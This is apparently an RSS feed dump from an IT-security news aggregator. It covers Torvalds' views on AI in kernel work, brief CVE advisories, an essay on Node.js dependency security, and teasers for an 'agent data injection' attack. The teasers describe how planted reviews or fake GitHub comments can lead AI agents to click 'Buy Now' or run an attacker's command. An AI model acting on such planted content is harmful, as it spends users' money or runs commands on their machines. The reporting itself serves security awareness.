<p class="wp-block-paragraph">Just a few weeks after the <a href="https://www.csoonline.com/article/4173224/github-scales-back-bug-bounties-reminds-users-security-is-their-responsibility-too.html#:~:text=And%20Linux%20creator%20Linus%20Torvalds%20recently%20warned%20that%20a%20%E2%80%9Ccontinued%20flood%E2%80%9D%20of%20AI-generated%20vulnerability%20reports%20had%20made%20the%20Linux%20kernel%20security%20mailing%20list%20%E2%80%9Calmost%20entirely%20unmanageable%E2%80%9D%20because%20of%20massive%20duplication%20from%20researchers%20using%20the%20same%20AI%20tools%20to%20find%20identical%20bugs.">Linux founder complained that a “continued flood” of AI-generated vulnerability reports</a> had made the Linux kernel security mailing list “almost entirely unmanageable”, he has come to see the advantages of the technology.</p>



<p class="wp-block-paragraph">“Linux is not one of those anti-AI projects,” Torvalds wrote in an email response to Linux Kernel senior engineer Roman Gushchin, <a href="https://lore.kernel.org/all/CAHk-%3Dwi4zC%2BZe8e%2Bp3tMv8TtG_80KzsZ1syL9anBtmEh5Z40vg@mail.gmail.com/">archived at Kernel.org</a>.</p>



<p class="wp-block-paragraph">“It can also be a somewhat painful tool, both for maintainer workloads and just from a ‘it keeps finding embarrassing bugs’ standpoint,” he said of the use of AI in security scanning. “The solution is to make sure those LLM tools help maintainers instead of just causing them pain.”</p>



<p class="wp-block-paragraph">Developers should be free to choose whether they use AI, he said. “We’re not forcing anybody to use it, but I will very loudly ignore people who try to argue against other people from using it.”</p>



<p class="wp-block-paragraph">Torvalds’ measured support for AI does not come completely out of the blue: Around the same time that he was complaining about AI distorting security maintenance, he also spoke about its usefulness, claiming that it could <a href="https://www.computerworld.com/article/4175956/the-ai-tech-job-slaughter-gets-real.html#:~:text=I%E2%80%99m%20personally%20100%25%20convinced%20that%20AI%20is%20changing%20programming.%E2%80%9D">improve programmer productivity by a factor of 10</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI OK in Linux development, says Torvalds]]></title>
<description><![CDATA[Linus Torvalds has a complicated relationship with AI, seeing both its good and bad points. But his latest remarks on the usefulness of AI may have raised a few eyebrows in open-source circles.



Just a few weeks after the Linux founder complained that a “continued flood” of AI-generated vulnera...]]></description>
<link>https://tsecurity.de/de/3676290/it-nachrichten/ai-ok-in-linux-development-says-torvalds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676290/it-nachrichten/ai-ok-in-linux-development-says-torvalds/</guid>
<pubDate>Fri, 17 Jul 2026 16:18:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Linus Torvalds has a complicated relationship with AI, seeing both its good and bad points. But his latest remarks on the usefulness of AI may have raised a few eyebrows in open-source circles.</p>



<p class="wp-block-paragraph">Just a few weeks after the <a href="https://www.csoonline.com/article/4173224/github-scales-back-bug-bounties-reminds-users-security-is-their-responsibility-too.html#:~:text=And%20Linux%20creator%20Linus%20Torvalds%20recently%20warned%20that%20a%20%E2%80%9Ccontinued%20flood%E2%80%9D%20of%20AI-generated%20vulnerability%20reports%20had%20made%20the%20Linux%20kernel%20security%20mailing%20list%20%E2%80%9Calmost%20entirely%20unmanageable%E2%80%9D%20because%20of%20massive%20duplication%20from%20researchers%20using%20the%20same%20AI%20tools%20to%20find%20identical%20bugs.">Linux founder complained that a “continued flood” of AI-generated vulnerability reports</a> had made the Linux kernel security mailing list “almost entirely unmanageable”, he has come to see the advantages of the technology.</p>



<p class="wp-block-paragraph">“Linux is not one of those anti-AI projects,” Torvalds wrote in an email response to Linux Kernel senior engineer Roman Gushchin, <a href="https://lore.kernel.org/all/CAHk-%3Dwi4zC%2BZe8e%2Bp3tMv8TtG_80KzsZ1syL9anBtmEh5Z40vg@mail.gmail.com/">archived at Kernel.org</a>.</p>



<p class="wp-block-paragraph">“It can also be a somewhat painful tool, both for maintainer workloads and just from a ‘it keeps finding embarrassing bugs’ standpoint,” he said of the use of AI in security scanning. “The solution is to make sure those LLM tools help maintainers instead of just causing them pain.”</p>



<p class="wp-block-paragraph">Developers should be free to choose whether they use AI, he said. “We’re not forcing anybody to use it, but I will very loudly ignore people who try to argue against other people from using it.”</p>



<p class="wp-block-paragraph">Torvalds’ measured support for AI does not come completely out of the blue: Around the same time that he was complaining about AI distorting security maintenance, he also spoke about its usefulness, claiming that it could <a href="https://www.computerworld.com/article/4175956/the-ai-tech-job-slaughter-gets-real.html#:~:text=I%E2%80%99m%20personally%20100%25%20convinced%20that%20AI%20is%20changing%20programming.%E2%80%9D">improve programmer productivity by a factor of 10</a>.</p>



<p class="wp-block-paragraph"><em>This article first appeared on InfoWorld.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Creator Linus Torvalds Rejects Anti-AI Push and Defends LLM Tools]]></title>
<description><![CDATA[Linux creator and top-level kernel maintainer Linus Torvalds has made it clear that the Linux kernel project will not adopt an anti-AI stance. He believes that large language models and related tools should be assessed based on their technical value…
Read more →
The post Linux Creator Linus Torva...]]></description>
<link>https://tsecurity.de/de/3675235/it-security-nachrichten/linux-creator-linus-torvalds-rejects-anti-ai-push-and-defends-llm-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675235/it-security-nachrichten/linux-creator-linus-torvalds-rejects-anti-ai-push-and-defends-llm-tools/</guid>
<pubDate>Fri, 17 Jul 2026 08:38:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Linux creator and top-level kernel maintainer Linus Torvalds has made it clear that the Linux kernel project will not adopt an anti-AI stance. He believes that large language models and related tools should be assessed based on their technical value…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/linux-creator-linus-torvalds-rejects-anti-ai-push-and-defends-llm-tools/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/linux-creator-linus-torvalds-rejects-anti-ai-push-and-defends-llm-tools/">Linux Creator Linus Torvalds Rejects Anti-AI Push and Defends LLM Tools</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Creator Linus Torvalds Rejects Anti-AI Push and Defends LLM Tools]]></title>
<description><![CDATA[Linux creator and top-level kernel maintainer Linus Torvalds has made it clear that the Linux kernel project will not adopt an anti-AI stance. He believes that large language models and related tools should be assessed based on their technical value rather than dismissed outright. His comments we...]]></description>
<link>https://tsecurity.de/de/3675161/it-security-nachrichten/linux-creator-linus-torvalds-rejects-anti-ai-push-and-defends-llm-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675161/it-security-nachrichten/linux-creator-linus-torvalds-rejects-anti-ai-push-and-defends-llm-tools/</guid>
<pubDate>Fri, 17 Jul 2026 07:53:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Linux creator and top-level kernel maintainer Linus Torvalds has made it clear that the Linux kernel project will not adopt an anti-AI stance. He believes that large language models and related tools should be assessed based on their technical value rather than dismissed outright. His comments were part of a discussion on the Linux Media […]</p>
<p>The post <a href="https://gbhackers.com/linux-creator-linus-torvalds-rejects-anti-ai-push/">Linux Creator Linus Torvalds Rejects Anti-AI Push and Defends LLM Tools</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-63086 | huggingface text-generation-inference up to 3.3.7 router/src/validation.rs fetch_image image_url server-side request forgery (EUVD-2026-44953)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in huggingface text-generation-inference up to 3.3.7. Affected is the function fetch_image of the file router/src/validation.rs of the component OpenAI-Compatible Multimodal Chat Completions Endpoint. Such manipulation of the argumen...]]></description>
<link>https://tsecurity.de/de/3674566/sicherheitsluecken/cve-2026-63086-huggingface-text-generation-inference-up-to-337-routersrcvalidationrs-fetchimage-imageurl-server-side-request-forgery-euvd-2026-44953/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674566/sicherheitsluecken/cve-2026-63086-huggingface-text-generation-inference-up-to-337-routersrcvalidationrs-fetchimage-imageurl-server-side-request-forgery-euvd-2026-44953/</guid>
<pubDate>Thu, 16 Jul 2026 22:06:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/huggingface:text-generation-inference">huggingface text-generation-inference up to 3.3.7</a>. Affected is the function <code>fetch_image</code> of the file <em>router/src/validation.rs</em> of the component <em>OpenAI-Compatible Multimodal Chat Completions Endpoint</em>. Such manipulation of the argument <em>image_url</em> leads to server-side request forgery. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-63086">CVE-2026-63086</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[New Agent Data Injection Attack Can Make AI Agents Misclick or Run Attacker Commands]]></title>
<description><![CDATA[Ask an AI agent to summarize the reviews on a product page, and a single planted review can make it click “Buy Now” instead. Ask a coding assistant to apply a maintainer’s fix from a GitHub thread, and a fake…
Read more →
The post New Agent Data Injection Attack Can Make AI Agents Misclick or Run...]]></description>
<link>https://tsecurity.de/de/3673508/it-security-nachrichten/new-agent-data-injection-attack-can-make-ai-agents-misclick-or-run-attacker-commands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673508/it-security-nachrichten/new-agent-data-injection-attack-can-make-ai-agents-misclick-or-run-attacker-commands/</guid>
<pubDate>Thu, 16 Jul 2026 14:53:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ask an AI agent to summarize the reviews on a product page, and a single planted review can make it click “Buy Now” instead. Ask a coding assistant to apply a maintainer’s fix from a GitHub thread, and a fake…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-agent-data-injection-attack-can-make-ai-agents-misclick-or-run-attacker-commands/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-agent-data-injection-attack-can-make-ai-agents-misclick-or-run-attacker-commands/">New Agent Data Injection Attack Can Make AI Agents Misclick or Run Attacker Commands</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Agent Data Injection Attack Can Make AI Agents Misclick or Run Attacker Commands]]></title>
<description><![CDATA[Ask an AI agent to summarize the reviews on a product page, and a single planted review can make it click "Buy Now" instead. Ask a coding assistant to apply a maintainer's fix from a GitHub thread, and a fake comment can make it run a stranger's command on your computer.

Neither trick hijacks th...]]></description>
<link>https://tsecurity.de/de/3673470/it-security-nachrichten/new-agent-data-injection-attack-can-make-ai-agents-misclick-or-run-attacker-commands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673470/it-security-nachrichten/new-agent-data-injection-attack-can-make-ai-agents-misclick-or-run-attacker-commands/</guid>
<pubDate>Thu, 16 Jul 2026 14:39:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ask an AI agent to summarize the reviews on a product page, and a single planted review can make it click "Buy Now" instead. Ask a coding assistant to apply a maintainer's fix from a GitHub thread, and a fake comment can make it run a stranger's command on your computer.

Neither trick hijacks the agent's task. Each one just corrupts the facts it trusts and lets it carry on with the job you]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-29515 | MiCode FileExplorer SwiFTP Server incorrect implementation of authentication algorithm]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in MiCode FileExplorer. This impacts an unknown function of the component SwiFTP Server. Such manipulation leads to incorrect implementation of authentication algorithm. This vulnerability only affects products that are no longer suppor...]]></description>
<link>https://tsecurity.de/de/3673230/sicherheitsluecken/cve-2026-29515-micode-fileexplorer-swiftp-server-incorrect-implementation-of-authentication-algorithm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673230/sicherheitsluecken/cve-2026-29515-micode-fileexplorer-swiftp-server-incorrect-implementation-of-authentication-algorithm/</guid>
<pubDate>Thu, 16 Jul 2026 13:21:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/micode:fileexplorer">MiCode FileExplorer</a>. This impacts an unknown function of the component <em>SwiFTP Server</em>. Such manipulation leads to incorrect implementation of authentication algorithm. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-29515">CVE-2026-29515</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Node.js security starts before CI]]></title>
<description><![CDATA[In many teams, dependency security still happens after the most important trust decision has already been made. A package is added, the lockfile changes, the feature moves forward, and only later does the pipeline ask whether the application should have trusted that code in the first place.



Th...]]></description>
<link>https://tsecurity.de/de/3672876/ai-nachrichten/nodejs-security-starts-before-ci/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672876/ai-nachrichten/nodejs-security-starts-before-ci/</guid>
<pubDate>Thu, 16 Jul 2026 11:04:19 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In many teams, dependency security still happens after the most important trust decision has already been made. A package is added, the lockfile changes, the feature moves forward, and only later does the pipeline ask whether the application should have trusted that code in the first place.</p>



<p class="wp-block-paragraph">That workflow made sense when dependency security was mostly viewed as a compliance check. Run a scanner. Produce a report. Fail the build if the risk crosses a threshold. Let someone decide what to do next.</p>



<p class="wp-block-paragraph">But the modern Node.js ecosystem has changed. The risk no longer begins in CI. It begins earlier, at the moment a developer decides to trust a package.</p>



<p class="wp-block-paragraph">That is why the next phase of <a href="https://www.infoworld.com/article/4158762/is-your-node-js-project-really-secure.html" data-type="link" data-id="https://www.infoworld.com/article/4158762/is-your-node-js-project-really-secure.html">Node.js security</a> cannot be limited to better pipeline enforcement. It has to move closer to the developer workflow, before dependencies become part of the application, before a pull request becomes someone else’s problem, and before a build log becomes the first moment anyone realizes that something important has changed.</p>



<h2 class="wp-block-heading"><a></a>Every install is a trust decision</h2>



<p class="wp-block-paragraph">The npm ecosystem is built on trust at an enormous scale. Every install is a trust decision. Every transitive dependency extends that decision to maintainers, packages, scripts, release pipelines, and infrastructure the application team may never inspect directly. This model gave JavaScript its incredible velocity. It also created one of its deepest security weaknesses.</p>



<p class="wp-block-paragraph">Recent npm supply chain incidents show why this matters. In March 2026, <a href="https://www.csoonline.com/article/4152696/attackers-trojanize-axios-http-library-in-highest-impact-npm-supply-chain-attack.html" data-type="link" data-id="https://www.csoonline.com/article/4152696/attackers-trojanize-axios-http-library-in-highest-impact-npm-supply-chain-attack.html">malicious Axios versions were published to npm</a> through a compromised maintainer account. Microsoft later described how those packages attempted to retrieve a second-stage payload during installation. In May 2026, <a href="https://tanstack.com/blog/npm-supply-chain-compromise-postmortem" data-type="link" data-id="https://tanstack.com/blog/npm-supply-chain-compromise-postmortem">TanStack published a postmortem</a> explaining that 84 malicious versions across 42 npm packages were published through a legitimate release pipeline after an attacker abused GitHub Actions behavior and runner trust boundaries. Security researchers also <a href="https://www.csoonline.com/article/4179866/infected-red-hat-npm-packages-expose-developer-credentials.html" data-type="link" data-id="https://www.csoonline.com/article/4179866/infected-red-hat-npm-packages-expose-developer-credentials.html">reported broader Mini Shai-Hulud activity</a> across the npm ecosystem in May, including hundreds of malicious package versions published in a short period.</p>



<p class="wp-block-paragraph">Not every one of these incidents is a traditional CVE. Some are malicious package compromises. Some involve CI/CD credential theft. Some involve maintainer or pipeline compromise. But they all point to the same larger issue: dependency risk is now part of everyday software engineering, not something that can be pushed entirely to a downstream security process.</p>



<h2 class="wp-block-heading"><a></a>The problem is not the scanner. It is the handoff.</h2>



<p class="wp-block-paragraph">Ubiquitous dependency risk changes what developers need from security tooling.</p>



<p class="wp-block-paragraph">The problem is not that teams lack scanners. Many organizations already run security checks in CI. The problem is that the output of those checks often arrives too late and speaks the wrong language for the person expected to act on it.</p>



<p class="wp-block-paragraph">A pull request fails. A long vulnerability report appears. The report may be technically accurate. It may contain the right advisory IDs, affected versions, dependency paths, severity labels, and references. But the developer still has to comb through the output and reconstruct the actual engineering decision from the evidence provided.</p>



<p class="wp-block-paragraph">That reconstruction is rarely simple. The developer has to understand which package introduced the issue, whether the vulnerable dependency is direct or transitive, whether the fix is actually within the application team’s control, and whether the recommended version is safe to adopt. They also have to determine whether the dependency is used in production or only during development, whether the update might break the application, and whether the fix belongs in the current pull request or requires separate engineering work.</p>



<p class="wp-block-paragraph">That uncertainty is where security work often slows. The scanner has detected risk, but the developer has not been given a clear path from detection to decision.</p>



<h2 class="wp-block-heading"><a></a>Security needs to move closer to engineering judgment</h2>



<p class="wp-block-paragraph">This is not a criticism of scanning. Scanning is necessary. CI enforcement is necessary. Centralized security platforms are necessary. But they are not sufficient, because they often operate after the trust decision has already been made.</p>



<p class="wp-block-paragraph">The real architectural question is this: where should dependency security live in the software development life cycle?</p>



<p class="wp-block-paragraph">If it lives only in CI, it becomes an interruption. If it lives only in dashboards, it becomes someone else’s queue. If it lives only in periodic audits, it becomes a backlog. But if it lives at the moment a dependency is introduced, upgraded, or reviewed, it becomes part of engineering judgment.</p>



<p class="wp-block-paragraph">That shift matters because modern JavaScript development is becoming faster than human review can comfortably handle. Developers no longer add dependencies only by reading documentation and choosing libraries manually. AI coding assistants can suggest packages, generate install commands, modify package files, and rewrite code around third-party APIs. Agentic development workflows can make dependency changes as part of broader automated refactors.</p>



<h2 class="wp-block-heading"><a></a>AI makes the trust boundary harder to see</h2>



<p class="wp-block-paragraph">That acceleration is useful. It also changes the risk model.</p>



<p class="wp-block-paragraph">When a human developer adds one package, the team can review the decision. When a coding agent modifies several dependencies as part of a larger task, the trust boundary becomes harder to see. The package file changes, the lockfile changes, the application still runs, and the pull request may look like a normal feature update. But the real security question may be hidden inside the dependency graph.</p>



<p class="wp-block-paragraph">This is where Node.js teams need a different mental model.</p>



<p class="wp-block-paragraph">Dependency adoption should not be treated as a small implementation detail. It should be treated as an architectural decision with security consequences. A new package is not just code reuse. It is a new trust relationship.</p>



<p class="wp-block-paragraph">That does not mean developers should stop using packages. The npm ecosystem exists because reuse works. Most teams cannot and should not build everything themselves. But convenience should not erase visibility. If a dependency becomes part of the application, the team should understand what was added, what changed in the lockfile, what risk comes with it, and what action is available if something is wrong.</p>



<h2 class="wp-block-heading"><a></a>Developers need confidence, not just reports</h2>



<p class="wp-block-paragraph">The same applies to remediation. Developers do not want a wall of vulnerability text. They want confidence. They want to know what action reduces risk, what version should be targeted, whether the change is safe, and whether the fix is actually under their control. A vulnerability report that leaves the developer uncertain may satisfy a process requirement, but it does not necessarily improve the speed or quality of remediation.</p>



<p class="wp-block-paragraph">That is the gap many teams feel today. Security tools are often very good at saying, “There is a problem.” They are less consistent at helping the developer answer, “What should I do next?”</p>



<p class="wp-block-paragraph">This is the broader problem I have been exploring through <a href="https://github.com/OWASP/cve-lite-cli">CVE Lite CLI</a>, now an OWASP project. The point is not that one command-line tool solves Node.js security. It does not. The larger idea is that dependency security has to move closer to the developer’s moment of decision. A useful developer-side security workflow should not merely report that risk exists. It should help the engineer understand whether the issue is in their control, what change is available, and whether the fix actually reduces risk.</p>



<h2 class="wp-block-heading"><a></a>The future is decision support, not just detection</h2>



<p class="wp-block-paragraph">That distinction is important. The future of Node.js security is not just more detection. It is better decision support.</p>



<p class="wp-block-paragraph">Security teams still need policy. Enterprises still need dashboards. CI still needs gates. But developers need something more immediate: a way to reason about dependency risk while the code is still fresh in their mind. That is where the ecosystem has to evolve.</p>



<p class="wp-block-paragraph">We already accept that testing belongs close to development. We accept that linting belongs close to development. We accept that formatting, type checking, and build validation belong close to development. Dependency security should follow the same path. It should not be treated as a mysterious report that appears at the end of the process. It should become part of the normal rhythm of engineering work.</p>



<p class="wp-block-paragraph">Before adding a package, developers should understand what trust relationship is being introduced. Before accepting an AI-generated dependency change, they should inspect what entered the graph. Before merging a pull request, teams should understand whether a vulnerability is direct, transitive, fixable, or blocked by another package. And before treating a CI failure as noise, organizations should ask whether the workflow is giving developers enough information to act confidently.</p>



<h2 class="wp-block-heading">Node.js security will be won, or lost, before CI runs</h2>



<p class="wp-block-paragraph">The Node.js ecosystem will not become safer by slowing down all development. That is unrealistic. It will become safer when security work is placed where developers can actually use it.</p>



<p class="wp-block-paragraph">The next generation of Node.js security will be won or lost before CI runs.</p>



<p class="wp-block-paragraph">It will be won when dependency decisions are still small enough to understand, fresh enough to review, and close enough to the developer for action to feel natural.</p>



<p class="wp-block-paragraph">That is the shift teams need to make now. Not from insecure to secure in one step, but from late detection to earlier judgment. From vulnerability reports to engineering decisions. From trusting packages by habit to understanding trust as part of software design.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-26214 | Xiaomi Galaxy FDS Android SDK up to 3.0.8 GalaxyFDSClientImpl.createHttpClient certificate host validation]]></title>
<description><![CDATA[A vulnerability was found in Xiaomi Galaxy FDS Android SDK up to 3.0.8. It has been classified as critical. This vulnerability affects the function GalaxyFDSClientImpl.createHttpClient. Performing a manipulation results in certificate with host mismatch. This vulnerability only affects products t...]]></description>
<link>https://tsecurity.de/de/3672825/sicherheitsluecken/cve-2026-26214-xiaomi-galaxy-fds-android-sdk-up-to-308-galaxyfdsclientimplcreatehttpclient-certificate-host-validation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672825/sicherheitsluecken/cve-2026-26214-xiaomi-galaxy-fds-android-sdk-up-to-308-galaxyfdsclientimplcreatehttpclient-certificate-host-validation/</guid>
<pubDate>Thu, 16 Jul 2026 10:40:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/xiaomi:galaxy_fds_android_sdk">Xiaomi Galaxy FDS Android SDK up to 3.0.8</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects the function <code>GalaxyFDSClientImpl.createHttpClient</code>. Performing a manipulation results in certificate with host mismatch. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-26214">CVE-2026-26214</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25869 | MiniGal Nano up to 0.3.5 index.php dir path traversal]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in MiniGal Nano up to 0.3.5. This vulnerability affects unknown code of the file index.php. The manipulation of the argument dir leads to path traversal. This vulnerability only affects products that are no longer supported by the maintaine...]]></description>
<link>https://tsecurity.de/de/3672696/sicherheitsluecken/cve-2026-25869-minigal-nano-up-to-035-indexphp-dir-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672696/sicherheitsluecken/cve-2026-25869-minigal-nano-up-to-035-indexphp-dir-path-traversal/</guid>
<pubDate>Thu, 16 Jul 2026 09:38:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/minigal:nano">MiniGal Nano up to 0.3.5</a>. This vulnerability affects unknown code of the file <em>index.php</em>. The manipulation of the argument <em>dir</em> leads to path traversal. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-25869">CVE-2026-25869</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25868 | MiniGal Nano up to 0.3.5 index.php currentdir cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in MiniGal Nano up to 0.3.5. It has been rated as problematic. This impacts an unknown function of the file index.php. This manipulation of the argument currentdir causes cross site scripting. This vulnerability only affects products that are no longer supported by the m...]]></description>
<link>https://tsecurity.de/de/3672691/sicherheitsluecken/cve-2026-25868-minigal-nano-up-to-035-indexphp-currentdir-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672691/sicherheitsluecken/cve-2026-25868-minigal-nano-up-to-035-indexphp-currentdir-cross-site-scripting/</guid>
<pubDate>Thu, 16 Jul 2026 09:38:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/minigal:nano">MiniGal Nano up to 0.3.5</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function of the file <em>index.php</em>. This manipulation of the argument <em>currentdir</em> causes cross site scripting. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-25868">CVE-2026-25868</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-71164 | Typesetter CMS up to 5.1 Editing include/tool/Editing.php images cross site scripting (ID 706 / EUVD-2026-2437)]]></title>
<description><![CDATA[A vulnerability was found in Typesetter CMS up to 5.1. It has been declared as problematic. Affected by this issue is some unknown functionality of the file include/tool/Editing.php of the component Editing Component. Such manipulation of the argument images leads to cross site scripting. This vu...]]></description>
<link>https://tsecurity.de/de/3672388/sicherheitsluecken/cve-2025-71164-typesetter-cms-up-to-51-editing-includetooleditingphp-images-cross-site-scripting-id-706-euvd-2026-2437/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672388/sicherheitsluecken/cve-2025-71164-typesetter-cms-up-to-51-editing-includetooleditingphp-images-cross-site-scripting-id-706-euvd-2026-2437/</guid>
<pubDate>Thu, 16 Jul 2026 07:09:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/typesetter:cms">Typesetter CMS up to 5.1</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is some unknown functionality of the file <em>include/tool/Editing.php</em> of the component <em>Editing Component</em>. Such manipulation of the argument <em>images</em> leads to cross site scripting. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2025-71164">CVE-2025-71164</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-71166 | Typesetter CMS up to 5.1 Administrative Interface Status.php path cross site scripting (ID 707 / EUVD-2026-2434)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Typesetter CMS up to 5.1. Impacted is an unknown function of the file include/admin/Tools/Status.php of the component Administrative Interface. The manipulation of the argument path results in cross site scripting. This vulnerability only a...]]></description>
<link>https://tsecurity.de/de/3672387/sicherheitsluecken/cve-2025-71166-typesetter-cms-up-to-51-administrative-interface-statusphp-path-cross-site-scripting-id-707-euvd-2026-2434/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672387/sicherheitsluecken/cve-2025-71166-typesetter-cms-up-to-51-administrative-interface-statusphp-path-cross-site-scripting-id-707-euvd-2026-2434/</guid>
<pubDate>Thu, 16 Jul 2026 07:09:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/typesetter:cms">Typesetter CMS up to 5.1</a>. Impacted is an unknown function of the file <em>include/admin/Tools/Status.php</em> of the component <em>Administrative Interface</em>. The manipulation of the argument <em>path</em> results in cross site scripting. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2025-71166">CVE-2025-71166</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-71165 | Typesetter CMS up to 5.1 Administrative Interface Status.php path cross site scripting (ID 709 / EUVD-2026-2428)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in Typesetter CMS up to 5.1. This affects an unknown function of the file include/admin/Tools/Status.php of the component Administrative Interface. Performing a manipulation of the argument path results in cross site scripting. This vulnera...]]></description>
<link>https://tsecurity.de/de/3672386/sicherheitsluecken/cve-2025-71165-typesetter-cms-up-to-51-administrative-interface-statusphp-path-cross-site-scripting-id-709-euvd-2026-2428/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672386/sicherheitsluecken/cve-2025-71165-typesetter-cms-up-to-51-administrative-interface-statusphp-path-cross-site-scripting-id-709-euvd-2026-2428/</guid>
<pubDate>Thu, 16 Jul 2026 07:09:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
